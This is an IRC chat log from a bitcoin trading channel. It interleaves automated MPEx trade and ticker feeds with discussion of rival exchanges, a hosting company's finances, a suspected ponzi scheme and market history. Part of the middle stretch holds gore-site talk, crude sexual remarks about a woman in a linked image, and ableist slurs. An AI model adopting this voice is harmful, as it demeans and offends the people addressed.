Feb 25 02:33:32 [MPEX] [S.MPOE] 4750 @ 0.00063413 = 3.0121 BTC [+] Feb 25 02:33:55 I mean over BTCT.co Feb 25 02:34:07 MPEx is already widely adopted Feb 25 02:34:23 BitFunder just landed Ziggap Feb 25 02:34:28 so I mean it's on the up and up Feb 25 02:34:31 like Jefferson's Feb 25 02:34:33 come on man Feb 25 02:34:41 ;;bc,stats Feb 25 02:34:43 Current Blocks: 222941 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 834 blocks | Next Difficulty In About: 5 days, 6 hours, 41 minutes, and 0 seconds | Next Difficulty Estimate: 4285577.28131 | Estimated Percent Change: 17.38054 Feb 25 02:35:09 ;;estimate Feb 25 02:35:13 Next difficulty estimate | 4285577.28131 based on data since last change | 4294795.69727 based on data for last three days Feb 25 02:36:15 ;;calc (.17 * 4285577.28131) + 4285577.28131 Feb 25 02:36:15 5014125.41913 Feb 25 02:36:21 argh Feb 25 02:36:31 But btct.co is better Feb 25 02:36:33 looks like it's not gonna break 8 million Feb 25 02:37:14 not anymore Feb 25 02:38:06 Why are people going there anyway? Feb 25 02:39:22 I dunno. BitFunder has a pretty friendly staff. Feb 25 02:39:34 BTCT.co too =/ Feb 25 02:40:51 [MPEX] [S.MPOE] 15196 @ 0.00063561 = 9.6587 BTC [+] Feb 25 02:41:16 both seem fine to me Feb 25 02:41:44 Well help btct.co land a huge client? Feb 25 02:41:52 BitFunder is great. Feb 25 02:42:00 They've been extremely helpful. Feb 25 02:42:03 I already got BitVPS moved to BTCT.co Feb 25 02:42:05 I cant say enough about their service. Feb 25 02:42:30 DeadTerra's GSDPT is there too, and a few good things too. Feb 25 02:43:03 string, you mean no 8mil diff, in regards to XDIFFMAR? Feb 25 02:43:35 Where are BitVPS's financials Feb 25 02:44:29 Eh, some place Feb 25 02:45:02 and you're the accountant? Feb 25 02:45:05 :| Feb 25 02:45:57 [BTCTC] [GSDPT] 5 @ 0.006 = 0.03 BTC [+] Feb 25 02:47:00 I'm fetching the links, one sec Feb 25 02:47:06 They're in my google drive. Feb 25 02:47:26 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFvQWJnZnRZQWJfbk1mNHYtVzhPR0E#gid=0 December Feb 25 02:47:37 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdHlkcElCUGR4a0tBc2JSM1FtQzI0VkE#gid=0 January Feb 25 02:47:57 Good stuff! This should be hosted on the website. Feb 25 02:48:01 Or at least linked to it Feb 25 02:48:15 [MPEX] [S.MPOE] 6435 @ 0.00063561 = 4.0902 BTC [+] Feb 25 02:48:16 [MPEX] [S.MPOE] 11293 @ 0.00063091 = 7.1249 BTC [-] Feb 25 02:48:17 [MPEX] [S.MPOE] 5955 @ 0.00061938 = 3.6884 BTC [-] Feb 25 02:48:18 [MPEX] [S.MPOE] 5418 @ 0.00061905 = 3.354 BTC [-] Feb 25 02:48:27 [MPEX] [S.MPOE] 7649 @ 0.00061783 = 4.7258 BTC [-] Feb 25 02:48:28 Will be published on our new website. We're dumping wordpress. Feb 25 02:49:07 We'll be a bit in the negative for the next few months. Purchased a server and there will be another on February's statement. Feb 25 02:50:00 We'll cut most of the server rent tho Feb 25 02:50:12 How do you plan on raising revenue? Feb 25 02:50:16 Except the switzerland node. Feb 25 02:50:23 You need more sales it seems... Feb 25 02:50:49 No... We just had too many rented servers not at full capacity. Feb 25 02:51:04 So what's the long term plan? Feb 25 02:51:22 I'm sorry to ask half retarded questions. Feb 25 02:52:10 Well a few month prior, before RG started to neglect, BitVPS was around ~3k USD income vs ~2k expenses Feb 25 02:52:24 According to our billing software Feb 25 02:53:03 It had dropped to a bit under 2k income when we got it. Feb 25 02:53:50 Did you lose clients due to rg's neglect? Feb 25 02:54:27 [MPEX] [S.MPOE] 4321 @ 0.00063578 = 2.7472 BTC [+] Feb 25 02:54:28 [MPEX] [S.MPOE] 1352 @ 0.00063583 = 0.8596 BTC [+] Feb 25 02:56:13 They were already gone when we got BitVPS Feb 25 02:56:42 the decline occured regularly during the last month until we took over BitVPS Feb 25 02:57:56 Plus some people left after, RG was not answering us and hadn't given us all login infos/datacenter info to pay server rents/contact them if there was issues. Feb 25 02:58:20 Fortunatly, not many. We were able to talk to them and support them at least. Feb 25 02:58:22 good 'ol rg for you Feb 25 02:58:32 what is the support turn around time? Feb 25 02:59:05 Immediately to 24 hours depending on if one of us is around. Feb 25 03:00:22 [MPEX] [S.MPOE] 4321 @ 0.00062445 = 2.6982 BTC [-] Feb 25 03:00:24 [MPEX] [S.MPOE] 5279 @ 0.0006241 = 3.2946 BTC [-] Feb 25 03:00:43 Namworld why can't some people like one and some people the other ? Feb 25 03:02:05 mircea: what? Feb 25 03:02:12 [MPEX] [S.MPOE] 4321 @ 0.00062442 = 2.6981 BTC [+] Feb 25 03:02:14 [MPEX] [S.MPOE] 22571 @ 0.0006241 = 14.0866 BTC [-] Feb 25 03:02:15 [MPEX] [S.MPOE] 5566 @ 0.00061783 = 3.4388 BTC [-] Feb 25 03:02:17 [MPEX] [S.MPOE] 2545 @ 0.00061751 = 1.5716 BTC [-] Feb 25 03:02:22 btct/bf Feb 25 03:02:30 oh... well that's fine really Feb 25 03:02:47 I just want BTCT.co to stay ahead Feb 25 03:03:20 never was ahead was it ? Feb 25 03:03:40 ? Feb 25 03:03:45 i stop reading for one second.... Feb 25 03:04:29 In volume no, but strictly because of DeadTerra's GSDPT Feb 25 03:04:43 Which was almost all the volume on BitFunder Feb 25 03:04:51 The battle for second place... Feb 25 03:04:58 does it really matter? Feb 25 03:05:11 both over very different and uniqe customer experiences Feb 25 03:05:15 offer Feb 25 03:05:16 not over Feb 25 03:05:21 btct has some really godo vol days Feb 25 03:05:23 good Feb 25 03:05:31 BF had some bad ones recently too Feb 25 03:05:35 it happens Feb 25 03:05:39 i don't even really know, what's the volumes ? Feb 25 03:05:43 its not a competition. really. Feb 25 03:05:49 mircea_popescu: depends on the day Feb 25 03:05:53 the other day BF was 20btc Feb 25 03:05:53 i mean per month Feb 25 03:05:56 oh Feb 25 03:06:14 !ticker h sdice Feb 25 03:06:16 [HAVELOCK:SDICE] 1D: 0.62410000 / 0.6552697 / 0.69400000 (362 shares, 237.20763070 BTC), 7D: 0.60000000 / 0.67835807 / 0.75100000 (1542 shares, 1046.02814202 BTC), 30D: 0.52100000 / 0.66793949 / 0.89000000 (11121 shares, 7428.15501446 BTC) Feb 25 03:06:21 https://btct.co/ <-- btct is 2,248.26 Feb 25 03:06:22 !ticker btct gsdpt Feb 25 03:06:23 for last 30 days Feb 25 03:06:24 [BTCT:GSDPT] 1D: 0.0059 / 0.006 / 0.006 (908 shares, 5.4 BTC), 7D: 0.0056 / 0.00606 / 0.0067 (6045 shares, 36.7 BTC), 30D: 0.0045 / 0.00638 / 0.0082 (182434 shares, 1164.5 BTC) Feb 25 03:06:32 i will have to calculate BFs Feb 25 03:06:39 so basically... something in the 5k range or so ? Feb 25 03:06:47 aha Feb 25 03:06:50 i specifically dont post BF's cause its not a war. Feb 25 03:07:06 jus' curious. Feb 25 03:07:23 BitFunder last 30 days: 5,411.3486 BTC Feb 25 03:07:40 [MPEX] [S.MPOE] 5655 @ 0.00061751 = 3.492 BTC [-] Feb 25 03:07:41 [MPEX] [S.MPOE] 15000 @ 0.00061733 = 9.26 BTC [-] Feb 25 03:07:43 [MPEX] [S.MPOE] 1750 @ 0.00061733 = 1.0803 BTC [-] Feb 25 03:07:51 [MPEX] [S.MPOE] 13495 @ 0.00061726 = 8.3299 BTC [-] Feb 25 03:07:55 BTCT.co about 2k volume Feb 25 03:07:57 I think MPOE is gonna hit .00059 soon Feb 25 03:08:04 AAPL syndrome Feb 25 03:08:45 [MPEX] [O.BTCUSD.P750T] 925 @ 1.52472178 = 1410.3676 BTC [-] Feb 25 03:08:46 possibly. Feb 25 03:09:13 !ticker m s.mpoe Feb 25 03:09:14 Namworld: more than that, 2.2k. Feb 25 03:09:14 [MPEX:S.MPOE] 1D: 0.00061726 / 0.00062849 / 0.00064195 (2090103 shares, 1,313.61 BTC), 7D: 0.00061726 / 0.00064099 / 0.00067884 (11486842 shares, 7,363.06 BTC), 30D: 0.0006153 / 0.00066219 / 0.0007 (62246075 shares, 41,218.98 BTC) Feb 25 03:09:46 so basically btct + bf = havelock sdice pt. Feb 25 03:10:01 mircea_popescu: http://www.bitbillions.com Feb 25 03:10:07 mircea: yeah Feb 25 03:10:08 the guy must be doing something right. Feb 25 03:10:26 "The information contained herein is CLASSIFIED and only intended for an exclusive few. " Feb 25 03:10:27 great. Feb 25 03:10:39 let's not know what words mean Feb 25 03:11:21 continue on and tell me you don't think it's a ponzi Feb 25 03:11:55 i don't need to continue, it's dumbassery "internet marketing" Feb 25 03:13:12 just look at this page at lease Feb 25 03:13:14 least* Feb 25 03:13:15 http://www.bitbillions.com/foundation/comp-plan.php Feb 25 03:13:17 now I can't english Feb 25 03:14:02 If GBBG earned $100,000,000 during a month, then we would deposit $10,000,000 into the 10% pool. We would deposit $5,000,000 into each of the 5% pools. We would deposit $20,000,000 into the 20% pool. You will earn your share of each pool depending upon your position in the matrix (how early you join) and the number of points you earn each month. Feb 25 03:14:09 right. Feb 25 03:14:17 except "earned" does not mean "taken in" Feb 25 03:14:57 this looks like something to get in on the ground level at Feb 25 03:15:08 shut up and take my coin Feb 25 03:15:20 lol Feb 25 03:15:35 thestringpuller actually looking at the graphs s.mpoe took less of a beating than s.dice Feb 25 03:16:08 yea I guess so... Feb 25 03:16:41 voorhees over supplied the market Feb 25 03:16:51 honest mistake Feb 25 03:16:51 hey, who's the guy that made a fortune shorting during the great depression ? Feb 25 03:16:55 terrible lapsus i got going Feb 25 03:17:16 i something Feb 25 03:18:11 Whitney Feb 25 03:18:14 or something like that Feb 25 03:18:35 whitney was the president of the stock exchange Feb 25 03:19:35 :P Feb 25 03:19:41 http://seekingalpha.com/article/296812-bear-raiders-the-dark-side-of-short-selling Feb 25 03:19:46 ahahaha this woman is SO RETARDED Feb 25 03:19:52 who the fuck is ellen brown Feb 25 03:20:08 "Ellen Brown developed her research skills as an attorney practicing civil litigation in Los Angeles" Feb 25 03:20:14 great. has no fucking idea of finance. Feb 25 03:20:18 [MPEX] [S.MPOE] 14700 @ 0.00062478 = 9.1843 BTC [+] Feb 25 03:21:10 i wish http://bitcoin-analytics.com/ wasn't so shitty Feb 25 03:22:29 Ukto you should post the IPO news on reddit Feb 25 03:23:10 [MPEX] [S.MPOE] 14851 @ 0.00062478 = 9.2786 BTC [+] Feb 25 03:23:28 Jesse Lauriston Livermore! Feb 25 03:23:28 aha! Feb 25 03:24:20 that awkward moment when the company you have sworn off using via tweet offers you free shit Feb 25 03:25:19 mircea_popescu: "He proceeded to lose 90% of that 1907 fortune on a blown cotton trade. He violated many of his key rules; he listened to another person's advice (he preferred working alone) and added to a losing position. He continued losing money in the flat markets from 1908.1912. He was $1 million in debt and declared bankruptcy. He proceeded to regain his fortune and repay his creditors during the World War Feb 25 03:25:43 yea Feb 25 03:25:54 In 1929, he noticed market conditions similar to that of the 1907 market. He began shorting various stocks and adding to his positions, and they kept declining in price. When just about everyone in the markets lost money in the Wall Street crash of 1929, Livermore was worth $100 million after his short-selling profits. Feb 25 03:25:59 Can never keep a good bull down Feb 25 03:26:20 he was a bear. Feb 25 03:26:49 It was never disclosed to anyone what happened to the great fortune he had made in the crash of 1929, but he had lost it all. <- ugh come on Feb 25 03:27:08 he prolly did. guy had the discipline of a candle in tropical weather. Feb 25 03:37:32 [MPEX] [S.MPOE] 6850 @ 0.00061726 = 4.2282 BTC [-] Feb 25 03:42:01 [MPEX] [S.MPOE] 9920 @ 0.00061726 = 6.1232 BTC [-] Feb 25 03:42:03 [MPEX] [S.MPOE] 1980 @ 0.00061614 = 1.22 BTC [-] Feb 25 03:48:41 [MPEX] [S.MPOE] 40300 @ 0.00062378 = 25.1383 BTC [+] Feb 25 03:49:49 [MPEX] [S.MPOE] 2401 @ 0.00062378 = 1.4977 BTC [+] Feb 25 03:49:51 [MPEX] [S.MPOE] 4321 @ 0.00062723 = 2.7103 BTC [+] Feb 25 03:49:53 [MPEX] [S.MPOE] 4321 @ 0.00062723 = 2.7103 BTC [+] Feb 25 03:49:54 [MPEX] [S.MPOE] 13157 @ 0.00062724 = 8.2526 BTC [+] Feb 25 03:53:51 is it possible to get last trade for a symbol on MPEx programmatically? Feb 25 03:55:58 i have a socket connection if ya need Feb 25 03:58:40 as in you'll let me hook into live data of some sort for some value of live? Feb 25 03:58:44 benkay http://mpex.co/faq.html#11 Feb 25 04:00:27 thanks mircea_popescu, does the rss feed include last trades in a particular time window/number of trades window, or does it include last trade for all symbols that have been traded? Feb 25 04:00:42 it includes the last dozen or so trades Feb 25 04:00:58 you can also get twitter to push data to you through their api i think Feb 25 04:01:06 tho im not really fresh on the details of that. Feb 25 04:01:29 and there's kako's assbot socket Feb 25 04:01:37 so that's three options dependign what serves you best. Feb 25 04:01:47 [MPEX] [S.MPOE] 25800 @ 0.00062724 = 16.1828 BTC [+] Feb 25 04:03:29 where find assbot docs? Feb 25 04:03:55 <- Feb 25 04:04:24 hi kako Feb 25 04:04:28 wat do Feb 25 04:05:23 do much Feb 25 04:05:29 hurr durr Feb 25 04:05:39 :) Feb 25 04:05:45 :) Feb 25 04:06:51 i would like last transaction on O.BTCUSD.C190T Feb 25 04:06:55 how do make query? Feb 25 04:08:15 from where? Feb 25 04:08:39 irc would suffice i suppose Feb 25 04:08:45 for temporary testing Feb 25 04:08:49 socket eventually Feb 25 04:13:01 did i answer the wrong question? Feb 25 04:13:17 maybe "my development box" would be a better answer Feb 25 04:13:24 um Feb 25 04:13:30 no such command atm Feb 25 04:13:41 you can follow cleaner chan here tho if you need #bitcoin-assets-trades Feb 25 04:16:11 is that all assbot? Feb 25 04:18:03 e? Feb 25 04:18:34 nvm Feb 25 04:20:19 that's a big hole, kakobrekla! < did I use that correctly? Feb 25 04:21:54 all assbot all the time Feb 25 04:21:56 [MPEX] [S.MPOE] 7000 @ 0.00062649 = 4.3854 BTC [-] Feb 25 04:21:58 [MPEX] [S.MPOE] 493 @ 0.00062724 = 0.3092 BTC [+] Feb 25 04:22:40 I was feeling particularly uninspired so my PoE char is called assbot Feb 25 04:26:21 dub, kakobrekla to your first one lol Feb 25 04:28:29 that doesnt parse Feb 25 04:29:59 edit Feb 25 04:30:36 er, quit :/ Feb 25 04:42:08 ;;asks 30 Feb 25 04:42:10 There are currently 1731.1427 bitcoins offered at or under 30.0 USD, worth 51787.0322238 USD in total. Feb 25 04:42:18 ;;bids 29 Feb 25 04:42:20 There are currently 4125.5309 bitcoins demanded at or over 29.0 USD, worth 120411.699441 USD in total. Feb 25 04:43:30 ;;;;ticker Feb 25 04:43:31 Error: ";;ticker" is not a valid command. Feb 25 04:43:33 ;;ticker Feb 25 04:43:34 BTCUSD ticker | Best bid: 29.78998, Best ask: 29.78999, Bid-ask spread: 0.00001, Last trade: 29.78999, 24 hour volume: 25045.65345806, 24 hour low: 29.20123, 24 hour high: 30.39877, 24 hour vwap: 29.79637 Feb 25 04:43:43 ;;bids 29.50 Feb 25 04:43:45 There are currently 762.10368 bitcoins demanded at or over 29.5 USD, worth 22563.8315869 USD in total. Feb 25 04:44:55 [MPEX] [S.MPOE] 14139 @ 0.00062885 = 8.8913 BTC [+] Feb 25 04:44:57 [MPEX] [S.MPOE] 661 @ 0.0006296 = 0.4162 BTC [+] Feb 25 04:46:29 [MPEX] [S.MPOE] 1139 @ 0.0006296 = 0.7171 BTC [+] Feb 25 04:46:31 [MPEX] [S.MPOE] 3261 @ 0.00063032 = 2.0555 BTC [+] Feb 25 04:50:27 bah fuck Feb 25 04:50:40 wasted 2 hours on something that is not a bug but a setting. Feb 25 04:51:00 gun. head. execute. Feb 25 04:52:24 lmao Feb 25 04:52:32 not a bug but a setting, that's new Feb 25 04:53:47 yeah Feb 25 04:53:56 i guess ill be regreting that most on my death bed Feb 25 04:54:03 "oh damn all those settings!!" Feb 25 04:54:11 .. i googled brain splatter for kako Feb 25 04:54:14 .. dont do that Feb 25 04:54:25 on the images search Feb 25 04:54:26 :P Feb 25 04:54:35 meh Feb 25 04:54:43 Bitcoinica: We've been hacked out of most of our funds. This is not a bug but a setting. Feb 25 04:54:48 i watched rotten and ate breakfast when i was 15 Feb 25 04:54:54 lol Feb 25 04:54:57 jk jk but you get the point Feb 25 04:54:58 rotton.com Feb 25 04:55:01 that still around? Feb 25 04:55:04 dunno Feb 25 04:55:07 rotten Feb 25 04:55:13 rotten.. torture... Feb 25 04:55:15 all them sites Feb 25 04:55:22 [MPEX] [S.MPOE] 4650 @ 0.00063032 = 2.931 BTC [+] Feb 25 04:55:24 bmezine was worse than rotten Feb 25 04:55:30 true Feb 25 04:55:43 you're the experts Feb 25 04:55:57 dudes hacking off their ballsacks and sowing them back on Feb 25 04:55:58 [MPEX] [S.MPOE] 14957 @ 0.00062725 = 9.3818 BTC [-] Feb 25 04:56:03 [MPEX] [S.MPOE] 7518 @ 0.00062651 = 4.7101 BTC [-] Feb 25 04:56:17 lol Feb 25 04:56:21 bmezine is dead ? Feb 25 04:56:23 why the sow back part Feb 25 04:56:28 --- Namworld has quit [brb masturbating] Feb 25 04:56:33 rofl Feb 25 04:57:27 why do bitcoin people so firmly believe the gubmint is out to get them ? Feb 25 04:57:28 kakobrekla: so you can hack them off again derp Feb 25 04:57:33 is this a movie thing or something ? Feb 25 04:57:44 mircea_popescu: why else are they poor and useless? Feb 25 04:57:51 its got to be someones fault! Feb 25 04:57:56 well ostensibly cause they suck at maffs Feb 25 04:58:00 who is gubmint Feb 25 04:58:11 http://www.urbandictionary.com/define.php?term=Gubmint Feb 25 04:58:28 a Feb 25 04:58:45 gubmint 223 up, 221 down Feb 25 04:58:45 Government, as used by right-wing pansies, used to "protest" progressive taxation against the capitalist class who stole the wealth from the working class in the first place. In the place of taxation, the right-wingers advocate charity, in other words, they ask the capitalists to be generous with other people's (working class) money! Feb 25 04:58:45 "Waah! The gubmint stole my money which I got by brutally exploiting third world sweatshop employees! Waah!" - Right-winger crying over taxes Feb 25 04:58:50 ok, the internet delivers. Feb 25 04:59:20 so... if you have money it's because you stole the dough rightfully belonging to those that don't have it Feb 25 04:59:22 yeah its not that bad Feb 25 04:59:24 the internet. Feb 25 04:59:28 as proven by the fact that they don't have it. Feb 25 05:00:10 [MPEX] [S.MPOE] 26025 @ 0.00063032 = 16.4041 BTC [+] Feb 25 05:07:57 pretty sure it was a hoax but bmezine did a peice on identical twins, one of whom cut an arm off and attached it to the other Feb 25 05:07:59 [MPEX] [S.MPOE] 4832 @ 0.00062651 = 3.0273 BTC [-] Feb 25 05:08:01 [MPEX] [S.MPOE] 2001 @ 0.00062439 = 1.2494 BTC [-] Feb 25 05:08:20 half the shit they ran was nonsense. Feb 25 05:08:30 just under his other arm on the torso, with enough blood vessles and shit to keep it alive but not move around Feb 25 05:08:41 even more hilarious, if you can steal money from someone, that proves that you have a greater right to it Feb 25 05:08:51 you're a better rational actor Feb 25 05:09:03 then they cut a finder off one of the other twins good arms and attached it to the middle finger on the first twins remaining hand Feb 25 05:09:08 finger* Feb 25 05:09:18 so he had a quad jointed middle finder Feb 25 05:09:34 or at least 3(4?) knuckles Feb 25 05:11:29 [MPEX] [S.MPOE] 2364 @ 0.00063032 = 1.4901 BTC [+] Feb 25 05:11:31 [MPEX] [S.MPOE] 5230 @ 0.00063059 = 3.298 BTC [+] Feb 25 05:11:32 [MPEX] [S.MPOE] 14096 @ 0.00063395 = 8.9362 BTC [+] Feb 25 05:11:33 benkay: well no. Feb 25 05:11:41 [MPEX] [S.MPOE] 18748 @ 0.00063583 = 11.9205 BTC [+] Feb 25 05:11:42 [MPEX] [S.MPOE] 26239 @ 0.00063588 = 16.6849 BTC [+] Feb 25 05:11:43 [MPEX] [S.MPOE] 5000 @ 0.00063655 = 3.1828 BTC [+] Feb 25 05:11:45 [MPEX] [S.MPOE] 9251 @ 0.00063656 = 5.8888 BTC [+] Feb 25 05:11:46 [MPEX] [S.MPOE] 30000 @ 0.00063656 = 19.0968 BTC [+] Feb 25 05:11:54 [MPEX] [S.MPOE] 33200 @ 0.00063668 = 21.1378 BTC [+] Feb 25 05:11:56 [MPEX] [S.MPOE] 8500 @ 0.00063681 = 5.4129 BTC [+] Feb 25 05:11:58 [MPEX] [S.MPOE] 5000 @ 0.00063701 = 3.1851 BTC [+] Feb 25 05:12:01 [MPEX] [S.MPOE] 12847 @ 0.00063702 = 8.1838 BTC [+] Feb 25 05:12:03 [MPEX] [S.MPOE] 11050 @ 0.00063738 = 7.043 BTC [+] Feb 25 05:12:05 [MPEX] [S.MPOE] 6755 @ 0.00063786 = 4.3087 BTC [+] Feb 25 05:12:06 [MPEX] [S.MPOE] 6755 @ 0.00063786 = 4.3087 BTC [+] Feb 25 05:12:07 [MPEX] [S.MPOE] 59850 @ 0.00063787 = 38.1765 BTC [+] Feb 25 05:12:09 [MPEX] [S.MPOE] 12750 @ 0.000638 = 8.1345 BTC [+] Feb 25 05:12:11 [MPEX] [S.MPOE] 15106 @ 0.00063827 = 9.6417 BTC [+] Feb 25 05:12:26 [MPEX] [S.MPOE] 6926 @ 0.00063873 = 4.4238 BTC [+] Feb 25 05:12:27 [MPEX] [S.MPOE] 17800 @ 0.00063974 = 11.3874 BTC [+] Feb 25 05:12:29 [MPEX] [S.MPOE] 10623 @ 0.00064082 = 6.8074 BTC [+] Feb 25 05:12:30 [MPEX] [S.MPOE] 14272 @ 0.00064084 = 9.1461 BTC [+] Feb 25 05:12:32 [MPEX] [S.MPOE] 23274 @ 0.00064092 = 14.9168 BTC [+] Feb 25 05:12:33 [MPEX] [S.MPOE] 78500 @ 0.00064175 = 50.3774 BTC [+] Feb 25 05:12:41 [MPEX] [S.MPOE] 34191 @ 0.00064281 = 21.9783 BTC [+] Feb 25 05:12:41 [MPEX] [S.MPOE] 32200 @ 0.00064292 = 20.702 BTC [+] Feb 25 05:12:43 [MPEX] [S.MPOE] 2903 @ 0.00064293 = 1.8664 BTC [+] Feb 25 05:12:45 [MPEX] [S.MPOE] 79950 @ 0.00064557 = 51.6133 BTC [+] Feb 25 05:12:57 [MPEX] [S.MPOE] 18900 @ 0.00064576 = 12.2049 BTC [+] Feb 25 05:12:59 [MPEX] [S.MPOE] 25400 @ 0.00064632 = 16.4165 BTC [+] Feb 25 05:13:00 [MPEX] [S.MPOE] 20650 @ 0.00064642 = 13.3486 BTC [+] Feb 25 05:13:02 go go go Feb 25 05:13:11 [MPEX] [S.MPOE] 21020 @ 0.00064677 = 13.5951 BTC [+] Feb 25 05:13:13 [MPEX] [S.MPOE] 9618 @ 0.00064746 = 6.2273 BTC [+] Feb 25 05:13:15 [MPEX] [S.MPOE] 4640 @ 0.00064999 = 3.016 BTC [+] Feb 25 05:13:17 [MPEX] [S.MPOE] 27050 @ 0.00065113 = 17.6131 BTC [+] Feb 25 05:13:18 [MPEX] [S.MPOE] 18124 @ 0.00065045 = 11.7888 BTC [-] Feb 25 05:13:19 [MPEX] [S.MPOE] 15926 @ 0.00065119 = 10.3709 BTC [+] Feb 25 05:13:20 [MPEX] [S.MPOE] 14803 @ 0.00065128 = 9.6409 BTC [+] Feb 25 05:13:27 so cool to watch live chart Feb 25 05:13:30 [MPEX] [S.MPOE] 19350 @ 0.00065195 = 12.6152 BTC [+] Feb 25 05:13:32 [MPEX] [S.MPOE] 4300 @ 0.00065211 = 2.8041 BTC [+] Feb 25 05:13:42 [MPEX] [S.MPOE] 5801 @ 0.0006528 = 3.7869 BTC [+] Feb 25 05:13:45 [MPEX] [S.MPOE] 5050 @ 0.00065334 = 3.2994 BTC [+] Feb 25 05:13:46 [MPEX] [S.MPOE] 17700 @ 0.00065538 = 11.6002 BTC [+] Feb 25 05:13:47 [MPEX] [S.MPOE] 1900 @ 0.00065545 = 1.2454 BTC [+] Feb 25 05:13:54 [MPEX] [S.MPOE] 24150 @ 0.00065704 = 15.8675 BTC [+] Feb 25 05:13:56 [MPEX] [S.MPOE] 4200 @ 0.00065721 = 2.7603 BTC [+] Feb 25 05:13:57 [MPEX] [S.MPOE] 17350 @ 0.00065877 = 11.4297 BTC [+] Feb 25 05:13:59 [MPEX] [S.MPOE] 18600 @ 0.00065886 = 12.2548 BTC [+] Feb 25 05:14:00 [MPEX] [S.MPOE] 3500 @ 0.00066 = 2.31 BTC [+] Feb 25 05:14:17 well holy shit. Feb 25 05:14:29 lulz Feb 25 05:14:46 heh mine went last Feb 25 05:14:56 the ask side looks real bare now Feb 25 05:15:05 dub i thought you didn't have bitcoins cause you suck ? Feb 25 05:15:17 mpoe != bitcoins Feb 25 05:15:35 oh ?! Feb 25 05:15:35 and I have bitcoins I just don;t have a working wallet I can access remote Feb 25 05:15:45 ok, that's possibly the best compliment i got today. Feb 25 05:15:47 because bitcoind is broken Feb 25 05:16:55 thats a lot of btcs Feb 25 05:16:56 lol Feb 25 05:16:59 its all erik's fault Feb 25 05:17:31 http://polimedia.us/dtng/c/src/136176176977.jpg one tit cutie says hi, Feb 25 05:17:38 whoever bought shares. Feb 25 05:18:02 one tit? was teh other cut off and attached to her twin? Feb 25 05:18:06 that would be rad Feb 25 05:18:14 no, it's attached to her interior vaginal wall Feb 25 05:18:22 making that canal real tight Feb 25 05:18:27 [MPEX] [S.MPOE] 21076 @ 0.00066333 = 13.9803 BTC [+] Feb 25 05:18:29 [MPEX] [S.MPOE] 525343 @ 0.00066 = 346.7264 BTC [-] Feb 25 05:18:46 melons Feb 25 05:18:56 jurov buying all the mpex Feb 25 05:19:08 do it for s.dice Feb 25 05:19:28 !ticker m s.mpoe Feb 25 05:19:30 [MPEX:S.MPOE] 1D: 0.00061614 / 0.00063657 / 0.00066333 (3658968 shares, 2,329.22 BTC), 7D: 0.00061614 / 0.00064159 / 0.00067884 (13036284 shares, 8,364.05 BTC), 30D: 0.0006153 / 0.00066165 / 0.0007 (63578833 shares, 42,067.47 BTC) Feb 25 05:19:41 pretty large day today. Feb 25 05:23:25 [MPEX] [S.MPOE] 1000 @ 0.00064454 = 0.6445 BTC [-] Feb 25 05:24:25 [MPEX] [S.MPOE] 3500 @ 0.00064454 = 2.2559 BTC [-] Feb 25 05:25:40 [MPEX] [S.MPOE] 12215 @ 0.00064454 = 7.8731 BTC [-] Feb 25 05:27:35 haha jurov nice favicon on live. Feb 25 05:31:59 [MPEX] [S.MPOE] 4321 @ 0.00065988 = 2.8513 BTC [+] Feb 25 05:32:01 [MPEX] [S.MPOE] 57729 @ 0.00066 = 38.1011 BTC [+] Feb 25 05:34:28 mircea_popescu: I'd like to know number of outstanding contracts/shares for a particular symbol. is this data available anywhere other than the MPEx charts? Feb 25 05:35:18 you mean mpex contracts ? Feb 25 05:35:31 yup Feb 25 05:35:58 well... anywhere that copies it from there ? Feb 25 05:36:02 maybe im not getting the q. Feb 25 05:36:23 [MPEX] [S.MPOE] 96516 @ 0.00065938 = 63.6407 BTC [-] Feb 25 05:36:25 [MPEX] [S.MPOE] 1500 @ 0.00065999 = 0.99 BTC [+] Feb 25 05:36:30 [MPEX] [S.MPOE] 6690 @ 0.00066 = 4.4154 BTC [+] Feb 25 05:36:32 [MPEX] [S.MPOE] 1640 @ 0.000665 = 1.0906 BTC [+] Feb 25 05:36:40 [MPEX] [S.MPOE] 27500 @ 0.0006675 = 18.3563 BTC [+] Feb 25 05:36:41 [MPEX] [S.MPOE] 8200 @ 0.0006744 = 5.5301 BTC [+] Feb 25 05:36:50 [MPEX] [S.MPOE] 25000 @ 0.00068 = 17 BTC [+] Feb 25 05:36:52 [MPEX] [S.MPOE] 75000 @ 0.00069997 = 52.4978 BTC [+] Feb 25 05:36:53 hmm Feb 25 05:36:54 [MPEX] [S.MPOE] 37530 @ 0.00069998 = 26.2702 BTC [+] Feb 25 05:36:55 [MPEX] [S.MPOE] 219208 @ 0.00069999 = 153.4434 BTC [+] Feb 25 05:36:57 [MPEX] [S.MPOE] 10408 @ 0.00069999 = 7.2855 BTC [+] Feb 25 05:36:59 [MPEX] [S.MPOE] 3490808 @ 0.0007 = 2443.5656 BTC [+] Feb 25 05:37:02 o lala Feb 25 05:37:04 ... Feb 25 05:37:28 i don't know if i'm articulating well. take for instance http://mpex.co/?mpsic=O.BTCUSD.C170T Feb 25 05:37:44 chart says 1'015 contracts Feb 25 05:38:06 that's volume, not necessarily outstanding. Feb 25 05:38:14 ah bad assumption on my part Feb 25 05:38:17 [MPEX] [S.MPOE] 1300000 @ 0.0007 = 910 BTC [+] Feb 25 05:38:20 do you provide that information? Feb 25 05:38:23 nope. Feb 25 05:38:37 as far as shares go the total share count is publisjhed in the contract Feb 25 05:38:46 but for options the open interest is not published. Feb 25 05:38:49 http://shrani.si/f/1z/RZ/3XgJk2UO/mpoe2.png Feb 25 05:38:58 why is that? Feb 25 05:39:14 kakobrekla is it a good thing ? Feb 25 05:39:31 dunno Feb 25 05:39:35 i was played a bit :p Feb 25 05:40:42 [HAVELOCK] [SDICE] 2 @ 0.6939 = 1.3878 BTC [-] Feb 25 05:41:32 i guess 100 satoshi a share is a good price in the end. Feb 25 05:41:41 a good dividend* Feb 25 05:41:42 i will give you 10 Feb 25 05:41:44 :P Feb 25 05:42:30 mircea_popescu: why not publish open interest? Feb 25 05:42:30 [MPEX] [S.MPOE] 1000 @ 0.00068316 = 0.6832 BTC [-] Feb 25 05:42:37 i find it hard to believe... all that's standing between now and mpoe being worth 1mn btc is like 100k asks Feb 25 05:42:51 benkay this why not stuff... why to ? Feb 25 05:43:11 valid Feb 25 05:43:40 is it an unusual inquiry? open interest, that is? Feb 25 05:43:51 this is bitcoin. what's usual ? Feb 25 05:44:28 wouldn't know; baby markets. 